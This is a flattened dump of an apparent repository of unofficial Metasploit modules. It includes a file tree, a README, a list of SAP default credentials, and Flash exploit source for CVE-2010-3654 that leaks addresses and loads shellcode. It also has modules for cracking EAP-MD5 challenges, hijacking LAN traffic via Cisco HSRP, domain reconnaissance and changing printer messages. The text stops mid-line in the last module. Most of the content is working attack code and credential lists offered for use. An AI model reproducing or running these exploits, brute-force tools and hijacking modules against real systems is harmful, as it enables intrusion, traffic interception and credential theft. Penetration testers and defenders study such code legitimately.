├── .gitignore ├── Gemfile.local ├── README.md ├── data ├── Kblist.txt ├── dns_mitm.txt ├── source │ └── exploits │ │ └── CVE-2010-3654 │ │ ├── Download.as │ │ ├── Original_Class.as │ │ ├── Real_Ref_Class.as │ │ └── main.as └── wordlists │ ├── http_default_devices.csv │ ├── http_default_fingerprints.csv │ ├── http_default_settings.csv │ ├── sap_common.txt │ ├── sap_default.txt │ └── sipproxy_replace.txt ├── lib ├── msf │ └── core │ │ ├── auxiliary │ │ ├── mixins.rb │ │ └── sip.rb │ │ └── exploit │ │ ├── powershell.rb │ │ └── sap.rb └── rex │ ├── exploitation │ └── powershell.rb │ └── proto │ ├── sip.rb │ └── sip │ └── socket.rb ├── modules ├── auxiliary │ ├── bruteforce │ │ └── eap_md5_dict.rb │ ├── capture │ │ ├── hsrp.rb │ │ └── mdns_collector.rb │ ├── gather │ │ ├── netcrafting.rb │ │ └── ripecon.rb │ ├── hp │ │ ├── hp_laserjet_download.rb │ │ ├── hp_laserjet_enum_fs.rb │ │ ├── hp_laserjet_ready_msg.rb │ │ ├── hp_laserjet_scanner.rb │ │ └── snmp_enum_hp_laserjet.rb │ ├── http │ │ └── vhost_finder.rb │ ├── scanner │ │ ├── http │ │ │ └── fingerprint.rb │ │ ├── sap │ │ │ ├── sap_rfc_brute_login.rb │ │ │ ├── sap_rfc_client_enum.rb │ │ │ ├── sap_rfc_dbmcli_sxpg_command_exec.rb │ │ │ ├── sap_rfc_python_sxpg_command_exec.rb │ │ │ ├── sap_rfc_read_table.rb │ │ │ ├── sap_rfc_sxpg_call_system.rb │ │ │ ├── sap_rfc_sxpg_command_exec.rb │ │ │ ├── sap_rfc_system.rb │ │ │ └── sap_rfc_usr02.rb │ │ └── sip │ │ │ ├── vsipbruteforce.rb │ │ │ ├── vsipenumerator.rb │ │ │ ├── vsipinvite.rb │ │ │ ├── vsipoptions.rb │ │ │ ├── vsipproxy.rb │ │ │ ├── vsipregister.rb │ │ │ └── vsiptrust.rb │ ├── securestate │ │ ├── cdp.rb │ │ ├── owa_login.rb │ │ └── proxy_config.rb │ ├── sqli │ │ └── oracle_erp_sqli1.rb │ └── unstable │ │ ├── boa_auth_dos.rb │ │ ├── cisco_vpn_groupname_enum.rb │ │ ├── d20tftpbd.rb │ │ ├── dns_mitm.rb │ │ ├── dtp.rb │ │ ├── duckduck_password.rb │ │ ├── eap_md5_dict.rb │ │ ├── enum_bing_url.rb │ │ ├── hsrp_hijack.rb │ │ ├── http_javascript_cookielogger.rb │ │ ├── http_server.rb │ │ ├── http_transparent_injection_proxy.rb │ │ ├── ip_geolocate.rb │ │ ├── javascript_keylogger.rb │ │ ├── joomla_filter_order_aux.rb │ │ ├── local_admin_pwnage_scanner.rb │ │ ├── ms11_082.rb │ │ ├── msftidyscan.rb │ │ ├── oracle_erp_sqli1.rb │ │ ├── pvstp.rb │ │ ├── smallftpd_dos.rb │ │ ├── smb_enumshares_rw.rb │ │ ├── spoonftp_retr.rb │ │ ├── stp.rb │ │ ├── strawman_post_dos.rb │ │ ├── syslog_spoof_custom_message.rb │ │ ├── syslog_spoof_log_file.rb │ │ ├── ttlexpiry.rb │ │ └── typsoft11_retr.rb ├── exploits │ ├── multi │ │ └── sap │ │ │ ├── sap_rfc_abap_install_and_run.rb │ │ │ ├── sap_rfc_sxpg_call_system.rb │ │ │ └── sap_rfc_sxpg_command_exec.rb │ ├── netspi │ │ └── ps_webshells.rb │ ├── securestate │ │ └── liferay_xsl.rb │ ├── unstable │ │ ├── incomplete │ │ │ ├── linux │ │ │ │ └── ids │ │ │ │ │ └── snortdcerpc.rb │ │ │ ├── multi │ │ │ │ ├── browser │ │ │ │ │ └── firefox_dom_insertion.rb │ │ │ │ └── http │ │ │ │ │ ├── jboss_seam_remote_command.rb │ │ │ │ │ └── jcow_eval.rb │ │ │ ├── telnet_encrypt_keyid_bruteforce.rb │ │ │ ├── unix │ │ │ │ └── samba │ │ │ │ │ └── sid_parse_jjd.rb │ │ │ └── windows │ │ │ │ ├── browser │ │ │ │ ├── adobe_embedded_com_firefox.rb │ │ │ │ ├── aol_linksbicons.rb │ │ │ │ ├── firefox_unicode.rb │ │ │ │ ├── kingview_validateuser.rb │ │ │ │ ├── ms09_054_deflate.rb │ │ │ │ ├── ms10_018_ie_uninit.rb │ │ │ │ ├── opera_content_length.rb │ │ │ │ ├── opera_svg.rb │ │ │ │ ├── oracle_autovue.rb │ │ │ │ ├── safari_feedurl.rb │ │ │ │ └── safari_float.rb │ │ │ │ ├── dameware_username_bof.rb │ │ │ │ ├── fileformat │ │ │ │ ├── adobe_flashplayer_flash10o.rb │ │ │ │ ├── mplayer_lite_m3u.rb │ │ │ │ ├── ms04_034_zip_folders.rb │ │ │ │ └── ms10_055_cinepak_codec.rb │ │ │ │ ├── ftp │ │ │ │ └── knftp.rb │ │ │ │ ├── http │ │ │ │ ├── hp_nnm_rptconfig_2704.rb │ │ │ │ ├── oracle_autovue.rb │ │ │ │ └── uplusftp_get_bof.rb │ │ │ │ ├── ldap │ │ │ │ └── ibm_tivoli_ibmslapd.rb │ │ │ │ ├── misc │ │ │ │ ├── edirectory_dhost_module.rb │ │ │ │ ├── hp_data_protector_exec_setup.rb │ │ │ │ └── hp_dataprotector_cmdexec.rb │ │ │ │ ├── scada │ │ │ │ └── issymbol_openscreen.rb │ │ │ │ ├── smb │ │ │ │ ├── ms09_050_smb2.rb │ │ │ │ └── ms09_064_llssrv.rb │ │ │ │ └── tftp │ │ │ │ ├── hp_imc_err.rb │ │ │ │ └── hp_imc_wrq.rb │ │ ├── unreliable │ │ │ └── windows │ │ │ │ ├── browser │ │ │ │ ├── ms10_081_comctl32_svg.rb │ │ │ │ └── webkit_styleelement_process.rb │ │ │ │ ├── fileformat │ │ │ │ ├── foxit_pdf_action_bof.rb │ │ │ │ └── ms10_087_rtf_pfragments_bof.rb │ │ │ │ ├── ftp │ │ │ │ ├── actfax_user_ftp.rb │ │ │ │ └── solarftp_pasv.rb │ │ │ │ ├── misc │ │ │ │ └── dameware_mrc4.rb │ │ │ │ └── scada │ │ │ │ └── cognet_datahub_bof.rb │ │ └── untested │ │ │ ├── arachni_exec.rb │ │ │ ├── arachni_path_traversal.rb │ │ │ ├── arachni_php_eval.rb │ │ │ ├── arachni_php_include.rb │ │ │ ├── arachni_sqlmap.rb │ │ │ ├── cisco_acs_ucp.rb │ │ │ ├── lotus_cookiefile.rb │ │ │ └── yahoo_player_m3u.rb │ └── windows │ │ ├── browser │ │ └── ie_unsafe_scripting.rb │ │ ├── dcerpc │ │ └── wmis_psh.rb │ │ ├── http │ │ └── oracle_endeca_exec.rb │ │ ├── local │ │ ├── current_user_psexec.rb │ │ ├── ms13_005_hwnd_broadcast.rb │ │ └── wmi.rb │ │ ├── misc │ │ └── psh_web_delivery.rb │ │ └── smb │ │ └── psexec_psh.rb └── post │ ├── linux │ └── q │ │ ├── passwd-shadow-ssh-jacker-meterpreter.rb │ │ └── passwd-shadow-ssh-jacker-shell.rb │ ├── unstable │ ├── enum_lsa.rb │ ├── enum_users.rb │ ├── exec_powershell.rb │ ├── keepass_jacker.rb │ ├── kill_by_name.rb │ ├── killmcafee.rb │ ├── openvpn_profiles_jack.rb │ └── unpriv_wmic.rb │ └── windows │ └── q │ ├── keepass_jacker.rb │ ├── openvpn_profiles_jack.rb │ ├── stickynotes-jacker.rb │ ├── unpriv_wmic.rb │ └── winlocalprv_esc.rb ├── plugins └── unstable │ └── arachni.rb └── scripts ├── cache_bomb.rb ├── getdomains.rb ├── getsessions.rb ├── ie_hashgrab.rb ├── listdrives.rb ├── loggedon.rb ├── runon_netview.rb ├── search_hash_creds.rc └── virusscan_bypass8_8.rb /.gitignore: -------------------------------------------------------------------------------- 1 | *.gem 2 | *.rbc 3 | .bundle 4 | .config 5 | coverage 6 | InstalledFiles 7 | lib/bundler/man 8 | pkg 9 | rdoc 10 | spec/reports 11 | test/tmp 12 | test/version_tmp 13 | tmp 14 | 15 | # YARD artifacts 16 | .yardoc 17 | _yardoc 18 | doc/ 19 | -------------------------------------------------------------------------------- /Gemfile.local: -------------------------------------------------------------------------------- 1 | group :sap do 2 | gem 'nwrfc', '>= 0.0.6' 3 | end 4 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | q - Readme 2 | == 3 | 4 | Collection of Modules gathered across time and internets 5 | ==== 6 | 7 | Basically this will be a repository of modules that have been found 8 | on the internets across the time that for one reason or another 9 | would not be accepted to the trunk. 10 | 11 | This pack is free (public github and all..) and released without 12 | warranty or license. 13 | 14 | Modules can be put here until they are ready to be submitted to MSF as a 15 | pull request, or if the author wants to license their module in a certain 16 | way that prevents it from being in trunk, all are welcome here. 17 | 18 | Something not working? 19 | === 20 | If you can code, submit a pull request, if you can't just descibe the issue 21 | to the best of your ability in a new "issue", or email me (mubix[at]hak5.org) 22 | if you don't want to have to create a Github account. 23 | 24 | Other available Metasploit modules/scripts/plugins: 25 | === 26 | 27 | MetaSSH - SSH session type with routing and more 28 | -=> https://github.com/dirtyfilthy/metassh 29 | 30 | MSFmap - Post-exploitation scanning plugin 31 | -=> http://code.google.com/p/msfmap/ -------------------------------------------------------------------------------- /data/dns_mitm.txt: -------------------------------------------------------------------------------- 1 | 192.168.0.2 google.com 2 | -------------------------------------------------------------------------------- /data/source/exploits/CVE-2010-3654/Download.as: -------------------------------------------------------------------------------- 1 | package poc { 2 | 3 | import flash.display.*; 4 | import flash.events.*; 5 | import flash.net.*; 6 | 7 | public class Download extends Sprite 8 | { 9 | 10 | public var myLoader:URLLoader = new URLLoader(); 11 | public var buf:String = new String(); 12 | 13 | public function init():void 14 | { 15 | var urlRequest:URLRequest = new URLRequest("test.bin"); 16 | myLoader.dataFormat = URLLoaderDataFormat.BINARY; 17 | myLoader.addEventListener(Event.COMPLETE, onComplete); 18 | myLoader.load(urlRequest); 19 | } 20 | 21 | 22 | public function onComplete(e:Event):void 23 | { 24 | buf = myLoader.data; 25 | dispatchEvent(new Event(Event.COMPLETE)); 26 | } 27 | 28 | public function getBinary():String { 29 | return buf; 30 | } 31 | 32 | } 33 | } -------------------------------------------------------------------------------- /data/source/exploits/CVE-2010-3654/Original_Class.as: -------------------------------------------------------------------------------- 1 | package poc { 2 | public class Original_Class 3 | { 4 | public static function static_func1(leak:uint,imageBase:uint):Original_Class 5 | { 6 | return null; 7 | } 8 | 9 | public static function ROPPayload(imageBase:uint, leak2:uint):uint 10 | { 11 | return 1; 12 | } 13 | 14 | public function normal_func():uint 15 | { 16 | return 0; 17 | } 18 | 19 | public static function strToInt(param_in:String) 20 | { 21 | } 22 | 23 | public static function shellcode():uint 24 | { 25 | return 1; 26 | } 27 | } 28 | 29 | } -------------------------------------------------------------------------------- /data/source/exploits/CVE-2010-3654/main.as: -------------------------------------------------------------------------------- 1 | // compile >mxmlc -source-path=c:\ C:\poc\main.as 2 | // decompress using SWF_Compressor 3 | // change 07 01 02 07 |01| 03 07 02 05 -> 07 01 02 07 01 |02| 07 02 05 4 | // Shahin [at] abysssec.com 5 | // twitter: @abysssec 6 | 7 | package poc 8 | { 9 | 10 | import flash.utils.*; 11 | import flash.display.*; 12 | import flash.text.*; 13 | import flash.external.* 14 | import flash.events.*; 15 | 16 | public class main extends Sprite 17 | { 18 | 19 | public var d:Download = new Download(); 20 | 21 | function get get_test1():Real_Ref_Class 22 | { 23 | return null; 24 | } 25 | 26 | public function main() 27 | { 28 | d.addEventListener(Event.COMPLETE, onLoad); 29 | d.init(); 30 | } 31 | 32 | public function onLoad(e:Event):void { 33 | var payload:String = d.getBinary(); 34 | Real_Ref_Class.setShellcode(payload); 35 | sploit(); 36 | } 37 | 38 | public function sploit() 39 | { 40 | /////////////////////// LEAK IMAGE BASE //////////////////////////// 41 | 42 | var objshellcode:uint = Original_Class.shellcode(); 43 | var p_objshellcode:uint = objshellcode & 0xFFFFFFF8; 44 | 45 | var str_objshellcode:String = p_objshellcode.toString(); 46 | var int_str_objshellcode = Original_Class.strToInt(str_objshellcode); 47 | 48 | var z:Number = new Number(int_str_objshellcode); 49 | var b:ByteArray = new ByteArray(); 50 | b.writeDouble(z); 51 | var res:uint = b[4]*0x1000000 + b[5]*0x10000 + b[6]*0x100 + b[7]; 52 | 53 | var imageBase:uint = res - 0X004E2F58; 54 | 55 | 56 | /////////////////// LEAK SHELLCODE STRING ADDRESS ///////////////// 57 | 58 | var temp:uint = p_objshellcode + 0x8; 59 | 60 | str = temp.toString(); 61 | istr = Original_Class.strToInt(str); 62 | 63 | z = new Number(istr); 64 | 65 | b = new ByteArray(); 66 | b.writeDouble(z); 67 | var SHELLCODELeak = b[4]*0x1000000 + b[5]*0x10000 + b[6]*0x100 + b[7]; 68 | 69 | 70 | ///////////////////// LEAK ROPPayload ADDRESS ///////////////// 71 | 72 | var objROPPayload:uint = Original_Class.ROPPayload(imageBase,SHELLCODELeak); 73 | var temp2:uint = objROPPayload & 0xFFFFFFF8; 74 | var str:String = temp2.toString(); 75 | var istr = Original_Class.strToInt(str); 76 | 77 | temp = temp2 + 0x8; 78 | 79 | str = temp.toString(); 80 | istr = Original_Class.strToInt(str); 81 | 82 | z = new Number(istr); 83 | 84 | b = new ByteArray(); 85 | b.writeDouble(z); 86 | var ROPPayloadLeak:uint = b[4]*0x1000000 + b[5]*0x10000 + b[6]*0x100 + b[7]; 87 | 88 | var obj:Original_Class = Original_Class.static_func1(ROPPayloadLeak, imageBase); 89 | obj.normal_func(); 90 | } 91 | } 92 | 93 | } -------------------------------------------------------------------------------- /data/wordlists/sap_common.txt: -------------------------------------------------------------------------------- 1 | sapservice 2 | sapadm 3 | adm 4 | sqd 5 | sapdb 6 | 7 | sapservice 8 | sapr3 9 | sapsr3 10 | ora 11 | -------------------------------------------------------------------------------- /data/wordlists/sap_default.txt: -------------------------------------------------------------------------------- 1 | SAP* 06071992 2 | SAP* PASS 3 | DDIC 19920706 4 | DDIC Welcome01 5 | SAPCPIC ADMIN 6 | EARLYWATCH SUPPORT 7 | TMSADM PASSWORD 8 | TMSADM ADMIN 9 | TMSADM $1Pawd2& 10 | ADMIN welcome 11 | ADSUSER ch4ngeme 12 | ADS_AGENT ch4ngeme 13 | DEVELOPER ch4ngeme 14 | J2EE_ADMIN ch4ngeme 15 | SAPJSF ch4ngeme 16 | SAPR3 SAP 17 | CTB_ADMIN sap123 18 | XMI_DEMO sap123 19 | 20 | -------------------------------------------------------------------------------- /data/wordlists/sipproxy_replace.txt: -------------------------------------------------------------------------------- 1 | #Seperation Char is \t (tab) 2 | #Regular Expressions Allowed 3 | #Source Replacement_Samples 4 | #regexp test content 124 5 | #1001 12**023 6 | #\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b 192.168.1.500 7 | -------------------------------------------------------------------------------- /lib/msf/core/auxiliary/mixins.rb: -------------------------------------------------------------------------------- 1 | # -*- coding: binary -*- 2 | 3 | # 4 | # Auxiliary mixins 5 | # 6 | require 'msf/core/auxiliary/auth_brute' 7 | require 'msf/core/auxiliary/dos' 8 | require 'msf/core/auxiliary/fuzzer' 9 | require 'msf/core/auxiliary/report' 10 | require 'msf/core/auxiliary/scanner' 11 | require 'msf/core/auxiliary/udp_scanner' 12 | require 'msf/core/auxiliary/timed' 13 | require 'msf/core/auxiliary/wmapmodule' 14 | require 'msf/core/auxiliary/web' 15 | require 'msf/core/auxiliary/crawler' 16 | 17 | require 'msf/core/auxiliary/commandshell' 18 | require 'msf/core/auxiliary/login' 19 | require 'msf/core/auxiliary/rservices' 20 | require 'msf/core/auxiliary/cisco' 21 | require 'msf/core/auxiliary/nmap' 22 | require 'msf/core/auxiliary/jtr' 23 | require 'msf/core/auxiliary/iax2' 24 | require 'msf/core/auxiliary/pii' 25 | require 'msf/core/auxiliary/sip' 26 | -------------------------------------------------------------------------------- /lib/rex/proto/sip.rb: -------------------------------------------------------------------------------- 1 | # -*- coding: binary -*- 2 | #Viproy SIP Library 3 | #Author : Fatih Ozavci - gamasec.net/fozavci 4 | #Github : github.com/fozavci/viproy-voipkit 5 | 6 | require 'rex/proto/sip/socket' 7 | -------------------------------------------------------------------------------- /modules/auxiliary/bruteforce/eap_md5_dict.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id: $ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | 13 | require 'msf/core' 14 | require 'packetfu' 15 | 16 | class Metasploit3 < Msf::Auxiliary 17 | 18 | include Msf::Exploit::Capture 19 | include Msf::Auxiliary::Report 20 | 21 | def initialize 22 | super( 23 | 'Name' => 'EAP-MD5 challenge dictionary attack.', 24 | 'Description' => %q{ 25 | This module launch a dictionary attack against an EAP-MD5 challenge. 26 | The PCAP should contains at least the following requests: 27 | EAP reponse, identity (contains the username) 28 | EAP request, MD5-challenge 29 | EAP response, MD5-challenge 30 | EAP success (the module validate the authentication was succesful) 31 | 32 | Compatible with wired and 802.11 - 802.1x environments. 33 | }, 34 | 'Author' => 35 | [ 36 | 'pello ' 37 | ], 38 | 'License' => MSF_LICENSE, 39 | 'Version' => '$Revision: $' 40 | ) 41 | 42 | begin 43 | require 'pcaprub' 44 | @@havepcap = true 45 | rescue ::LoadError 46 | @@havepcap = false 47 | end 48 | 49 | register_options( 50 | [ 51 | OptString.new('WORDLIST', [ true, "Wordlist file for challenge bruteforce.", '']) 52 | ], self.class) 53 | 54 | deregister_options('RHOST','NETMASK','TIMEOUT','FILTER','SNAPLEN','INTERFACE') 55 | 56 | end 57 | 58 | def find_eap_challenge 59 | eapinfo = Hash.new 60 | cap = PacketFu::PcapFile.new.f2a(:filename => datastore['PCAPFILE']) 61 | cap.each do |pkt| 62 | begin 63 | case pkt[30,4].unpack('H4').join 64 | when "888e" # 802.11 65 | if pkt[36].to_i == 2 and pkt[40].to_i == 4 66 | eapinfo['resp'] = pkt[42..(42 + pkt[41] - 1)] 67 | eapinfo['id'] = pkt[37] 68 | elsif pkt[36].to_i == 1 and pkt[40].to_i == 4 69 | eapinfo['req'] = pkt[42..(42 + pkt[41] - 1)] 70 | elsif pkt[36].to_i == 2 and pkt[40].to_i == 1 71 | eapinfo['user'] = pkt[42..(42 + pkt[41] - 1)] 72 | elsif pkt[36].to_i == 3 73 | eapinfo['status'] = true 74 | else 75 | next 76 | end 77 | end 78 | case pkt[12,4].unpack('H4').join 79 | when "888e" # 802.3 80 | if pkt[18].to_i == 2 and pkt[22].to_i == 4 81 | eapinfo['resp'] = pkt[24..(24 + pkt[23] - 1)] 82 | eapinfo['id'] = pkt[19] 83 | elsif pkt[18].to_i == 1 and pkt[22].to_i == 4 84 | eapinfo['req'] = pkt[24..(24 + pkt[23] - 1)] 85 | elsif pkt[18].to_i == 2 and pkt[22].to_i == 1 86 | eapinfo['user'] = pkt[24..(24 + pkt[23] - 1)] 87 | elsif pkt[18].to_i == 3 88 | eapinfo['status'] = true 89 | else 90 | next 91 | end 92 | end 93 | if data.length == 5 then break end 94 | rescue 95 | next 96 | end 97 | end 98 | eapinfo 99 | end 100 | 101 | def compare_challenge_and_passwords(reqchallenge, respchallenge, id, user) 102 | correctpass = "" 103 | print_status("Passwords loaded from #{datastore['WORDLIST']}") 104 | File.open(datastore['WORDLIST'],"r").each_line do |p| 105 | md5 = Rex::Text.md5(2.chr + p.rstrip + reqchallenge) 106 | if md5 == respchallenge.unpack('H2'*respchallenge.length).join 107 | correctpass = p 108 | break 109 | end 110 | end 111 | if correctpass.empty? 112 | print_error("Password not found.") 113 | else 114 | print_good("The login/password is: #{user}/#{correctpass}") 115 | report_note( 116 | :type => 'EAP-MD5', 117 | :user => user, 118 | :pass => correctpass) 119 | end 120 | 121 | end 122 | 123 | def run 124 | 125 | print_status("Looking for EAP-MD5 challenge in #{datastore['PCAPFILE']}") 126 | 127 | eap = find_eap_challenge 128 | if !defined? eap['req'] or !defined? eap['resp'] 129 | print_error("There is no EAP-MD5 challenge in the PCAP file") 130 | elsif !eap['status'] 131 | print_error("There is no succesful EAP-MD5 challenge in the PCAP file") 132 | else 133 | compare_challenge_and_passwords(eap['req'], eap['resp'], eap['id'], eap['user']) 134 | end 135 | 136 | end 137 | 138 | 139 | end 140 | -------------------------------------------------------------------------------- /modules/auxiliary/capture/hsrp.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id: $ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | 13 | require 'msf/core' 14 | require 'racket' 15 | 16 | class Metasploit3 < Msf::Auxiliary 17 | 18 | include Msf::Exploit::Capture 19 | 20 | def initialize 21 | super( 22 | 'Name' => 'Cisco HSRP traffic hijacking.', 23 | 'Description' => %q{ 24 | This module will direct LAN traffic to the attacker host if HSRP is present. 25 | }, 26 | 'Author' => [ 'pello' ], 27 | 'License' => MSF_LICENSE, 28 | 'Version' => '$Revision: $' 29 | ) 30 | register_options( 31 | [ 32 | Opt::RPORT(1985), 33 | OptString.new('INTERFACE', [true, "The name of the interface", 'eth0']) 34 | ], self.class) 35 | 36 | deregister_options('PCAPFILE','SNAPLEN','FILTER') 37 | 38 | begin 39 | require 'pcaprub' 40 | @@havepcap = true 41 | rescue ::LoadError 42 | @@havepcap = false 43 | end 44 | end 45 | 46 | def hsrp_listen 47 | pcap = Pcap::open_live(datastore['INTERFACE'], 1500, false, 3) 48 | pcap.setfilter("host 224.0.0.2 and udp port 1985") 49 | begin 50 | print_status("Sniffing traffic.....") 51 | Timeout.timeout(3) do 52 | pcap.each do |pkt| 53 | eth = Racket::L2::Ethernet.new(pkt) 54 | ip = Racket::L3::IPv4.new(eth.payload) 55 | udp = Racket::L4::UDP.new(ip.payload) 56 | hsrp = Racket::L5::HSRP.new(udp.payload) 57 | @hsrp_group = hsrp.group 58 | @hsrp_vip = hsrp.vip 59 | @hsrp_password = hsrp.password 60 | return true 61 | end 62 | end 63 | rescue Timeout::Error 64 | return false 65 | end 66 | 67 | end 68 | 69 | def run 70 | 71 | raise "Pcaprub is not available" if not @@havepcap 72 | 73 | @run = false 74 | @hsrp_group = 1 75 | @hsrp_priority = 254 76 | @hsrp_vip = "" 77 | @hsrp_password = "cisco" 78 | 79 | if hsrp_listen 80 | print_status("Vip: " << @hsrp_vip << " Group: " << @hsrp_group.to_s << " Password: " << @hsrp_password) 81 | print_good("Start traffic hijacking.....") 82 | 83 | else 84 | print_error("No HSRP traffic.") 85 | return false 86 | end 87 | 88 | @run = true 89 | 90 | n = Racket::Racket.new 91 | n.l2 = Racket::L2::Ethernet.new 92 | n.l2.ethertype = 0x0800 93 | n.l2.dst_mac = "01:00:5e:00:00:02" 94 | n.l3 = Racket::L3::IPv4.new 95 | n.l3.src_ip = datastore['RHOST'] 96 | n.l3.dst_ip = "224.0.0.2" 97 | n.l3.protocol = 0x11 98 | n.l4 = Racket::L4::UDP.new 99 | n.l4.src_port = 1985 100 | n.l4.dst_port = 1985 101 | n.l5 = Racket::L5::HSRP.new 102 | n.l5.group = @hsrp_group 103 | n.l5.priority = @hsrp_priority 104 | n.l5.password = @hsrp_password 105 | n.l5.opcode = 0 106 | n.l5.state = 16 107 | n.l5.vip = @hsrp_vip 108 | 109 | n.l4.payload = n.l5 110 | n.l4.fix!(n.l3.src_ip, n.l3.dst_ip) 111 | n.l4.payload = "" 112 | 113 | n.iface = datastore['INTERFACE'] 114 | n.pack() 115 | while @run 116 | n.send2() 117 | select(nil, nil, nil, 3) 118 | end 119 | 120 | end 121 | 122 | end 123 | -------------------------------------------------------------------------------- /modules/auxiliary/gather/netcrafting.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This file is part of the Metasploit Framework and may be subject to 3 | # redistribution and commercial restrictions. Please see the Metasploit 4 | # web site for more information on licensing and terms of use. 5 | # http://metasploit.com/ 6 | ## 7 | 8 | require 'msf/core' 9 | require 'rexml/document' 10 | 11 | class Metasploit3 < Msf::Auxiliary 12 | 13 | include Msf::Exploit::Remote::HttpClient 14 | include Msf::Auxiliary::Report 15 | 16 | def initialize 17 | super( 18 | 'Name' => 'NetcRafting - a Netcraft domain Query Tool', 19 | 'Version' => '$Revision$', 20 | 'Description' => %q{ 21 | This module identify domain that contain a given keyword using Netcraft 22 | search domain functionality. Please agree with terms and conditions prior 23 | using this module (http://news.netcraft.com/fair-use-copyright). 24 | }, 25 | 26 | 'Author' => 27 | [ 28 | 'Cristiano Maruti ' 29 | ], 30 | 31 | 'References' => 32 | [ 33 | ['URL', 'http://http://searchdns.netcraft.com'] 34 | ], 35 | 36 | 'License' => MSF_LICENSE 37 | ) 38 | 39 | register_options([ 40 | OptString.new('RHOST', [true, 'The IP address of Netcraft searchdns server', '194.72.238.150']), 41 | OptString.new('VHOST', [true, 'The host name runnning Netcraft searchdns tool', 'searchdns.netcraft.com']), 42 | OptString.new('OUTFILE', [false, "A filename to store the results of the module"]), 43 | OptString.new('KEYWORD', [true, 'Keyword you want to search for (ex. Microsoft, Google)']), 44 | ], self.class) 45 | 46 | end 47 | 48 | def netcraft_url 49 | "http://#{datastore['VHOST']}:80" 50 | end 51 | 52 | def save_output(data) 53 | f = ::File.open(datastore['OUTFILE'], "wb") 54 | f.write(data) 55 | f.close 56 | print_status("Save results in #{datastore['OUTFILE']}") 57 | end 58 | 59 | def do_search_netcraft(keyword) 60 | 61 | payload = "#{netcraft_url}?restriction=site+contains&host=*#{Rex::Text.uri_encode(keyword)}*" 62 | #print_good("#{payload}") 63 | 64 | # Save the results to this table 65 | tbl = Rex::Ui::Text::Table.new( 66 | 'Header' => 'Query Results', 67 | 'Indent' => 1, 68 | 'Columns' => ['Site', 'Netblock', 'OS'], 69 | ) 70 | 71 | begin 72 | res = send_request_raw({ 73 | 'method' => 'GET', 74 | 'uri' => payload 75 | }, 20) 76 | 77 | if(res) 78 | begin 79 | res.body.scan(/\/site_report\?url=http:\/\/(.+)"><\/a><\/td>\n.+<\/td>\n.+\/netblock\?q=[a-z0-9\-\.,]+">(.*)<\/a><\/td>\n.+\/up\/graph\/\?host=.+">(.*)<\/a>/i) do |m| 80 | tbl << ["#{m[0]}", "#{m[1]}", "#{m[2]}"] 81 | end 82 | 83 | if not res.body.scan(/\/\?host=\*#{keyword}\*&.*&position=/i)[0].nil? 84 | payload = "#{netcraft_url}" << res.body.scan(/\/\?host=\*#{keyword}\*&.*&position=/i)[0] 85 | end 86 | 87 | rescue Exception => e 88 | print_error("Error retrieving details in the page body") 89 | vprint_line(e.message) 90 | end 91 | else 92 | print_error("Failed to connect to #{netcraft_url}") 93 | end 94 | 95 | end while (not res.body.scan(/Next page<\/b>/i)[0].nil?) 96 | 97 | #Show data and maybe save it if needed 98 | print_line("\n#{tbl.to_s}") 99 | save_output(tbl.to_s) if not datastore['OUTFILE'].nil? 100 | end 101 | 102 | def run() 103 | 104 | begin 105 | print_status("NetcRafting results:") 106 | do_search_netcraft(datastore['KEYWORD']) 107 | 108 | rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout 109 | rescue ::Timeout::Error, ::Errno::EPIPE 110 | end 111 | 112 | end 113 | 114 | end 115 | -------------------------------------------------------------------------------- /modules/auxiliary/hp/hp_laserjet_ready_msg.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This file is part of the Metasploit Framework and may be subject to 3 | # redistribution and commercial restrictions. Please see the Metasploit 4 | # web site for more information on licensing and terms of use. 5 | # http://metasploit.com/ 6 | ## 7 | 8 | require 'msf/core' 9 | 10 | class Metasploit3 < Msf::Auxiliary 11 | 12 | include Msf::Exploit::Remote::Tcp 13 | include Msf::Auxiliary::Report 14 | include Msf::Auxiliary::Scanner 15 | 16 | def initialize(info={}) 17 | super(update_info(info, 18 | 'Name' => 'HP LaserJet Printer Replace READY Message', 19 | 'Description' => %q{ 20 | This module allows to specifie a message that replaces the READY 21 | message on the printer control panel. Does not affect online state. 22 | }, 23 | 'References' => 24 | [ 25 | ['URL', 'http://h20000.www2.hp.com/bc/docs/support/SupportManual/bpl13208/bpl13208.pdf'] 26 | ], 27 | 'Author' => 'Matteo Cantoni ', 28 | 'License' => MSF_LICENSE 29 | )) 30 | 31 | register_options( 32 | [ 33 | Opt::RPORT(9100), 34 | OptString.new('MESSAGE', [true, 'The message that will appear on the printer control panel', 'MSF!']) 35 | ], self.class) 36 | 37 | deregister_options('VHOST') 38 | end 39 | 40 | # PJL commands are recognized by the following HP printers: 41 | # 42 | # . LaserJet IIISi, 4Si, 4SiMx, 5Si, 5SiMx, 5Si Mopier 43 | # . LaserJet 1100 Series, 2100 Series 44 | # . LaserJet 4000 Series, 5000 Series 45 | # . LaserJet 8000 Series, 8100 Series 46 | # . LaserJet 4V, 4MV 47 | # . LaserJet 4, 4 Plus, 4M, 4M Plus, 5, 5M 48 | # . LaserJet 4L, 4ML, 4LJ Pro, 4LC, 5L, 6L 49 | # . LaserJet 4P, 4MP, 4PJ, 5P, 6P, 6MP 50 | # . Color LaserJet, Color LaserJet 5, 5M 51 | # . Color LaserJet 4500 Series, 8500 Series 52 | # . DeskJet 1200C, 1600C 53 | # . DesignJet Family 54 | # . PaintJet XL300 55 | 56 | def run_host(ip) 57 | 58 | port = datastore['RPORT'] 59 | 60 | # The message can be any combination of printable characters (except 61 | # quotation marks, character 34) and spaces, with a limit of 1 line 62 | # of 16 characters. The message variable is a string and must be 63 | # enclosed in double quotes as shown in the command syntax. 64 | message = datastore['MESSAGE'] 65 | 66 | if ((message.length() > 16) or (message =~ /"/)) 67 